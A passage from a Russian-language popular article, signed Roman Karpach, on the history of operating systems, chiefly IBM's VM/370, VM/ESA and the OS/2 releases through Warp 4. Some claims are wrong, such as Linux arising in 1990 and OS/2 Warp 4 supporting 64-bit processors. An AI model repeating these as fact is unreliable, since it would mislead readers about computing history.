UNIX 5. Было зарегистрировано четыре с половиной миллиона пользователей этой эпической операционной системы. Кстати, что касается Linux, то он возник лишь в 1990 году, а первая официальная версия ОС вышла лишь в октябре 1991 . Как и BSD, он распространялся с исходниками, чтобы любой пользователь мог настроить ее себе так, как ему хочется.
Часть-4 IBM и операционные системы.
Все началось с OC VM (Virtual Machine), что вышла в 1972 году. Выпущенный тогда продукт назывался VM/370 и был предназначен для поддержания сервера для определенного количества пользователей. Эта ОС, давно отметившая свой 30-летний юбилей, по истории которой можно изучать развитие технологий IВМ в области серверных операционных систем и сетевых решений, является надежной и мощной базой для организации корпоративной информационно-вычислительной системы, ориентированной на многопользовательскую среду крупной современной фирмы. Система VM/ESA очень эффективно использует возможности аппаратного обеспечения и несколько менее требовательна к вычислительным ресурсам компьютера по сравнению с OS/390, что делает ее хорошим вариантом для использования в качестве платформы для корпоративной системы, информационного сервера крупной организации или сервера в internet. Позже IBM организовала совместный проект компаний Microsoft нацеленный на создание операционной системы, лишенной недостатков. Первая версия OS/2 вышла в конце 1987 года. Она была в состоянии использовать развитые вычислительные возможности процессора и обладала средствами обеспечения связи с большими машинами фирмы IВМ. В 1993 году фирма выпустила 0S/2 2.1, полностью 32-разрядную систему, обладавшую способностью выполнять приложения, созданные для Windows, имевшую высокую производительность и поддерживающую большое количество периферийных устройств. В 1994 году вышла 0S/2 WARP 3. В этой реализации, помимо дальнейшего повышения производительности и снижения требований к аппаратным ресурсам, появилась поддержка работы в internet. Сейчас же из последних версий следует отметить лишь 0S/2 Warp4, способную работать с 64-разрядными процессорами. Кроме того, в ней довольно полно представлены средства взаимодействия с internet, позволяющие 0S/2 выполнять не только клиентские программы, но и выступать в качестве сервера. Начиная с третьей версии, фирмой IВМ поставляются локализованные версии 0S/2 для России. Пройдя довольно большой и сложный путь, эта ОС для персональных компьютеров обладает сегодня такими особенностями, как реальная многозадачность, продуманные и надежные подсистемы управления памятью и администрирования процессов, встроенная поддержка работы в сети и дополнительные функции сетевого сервера, мощный язык программирования REXX, предназначенный для решения задач системного администрирования. Перечисленные возможности позволяют использовать 0S/2 в качестве операционной системы для мощных рабочих станций или сетевых серверов.
Как видите, история наших с вами компьютеров была очень извилиста и неоднородна. Но всегда при любых обстоятельствах специалисты создававшие компьютеры шли вперёд по пути прогресса. И лишь только поэтому стоит помнить их имена!
P.S
В публикации я специально не касался операционных систем семейства WINDOWS и LINUX. Чтобы лишний раз не вызвать кривотолков и бесполезных дискуссий. Тем более история этих систем ещё в памяти у многих читателей.

Роман Карпач

Pages: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38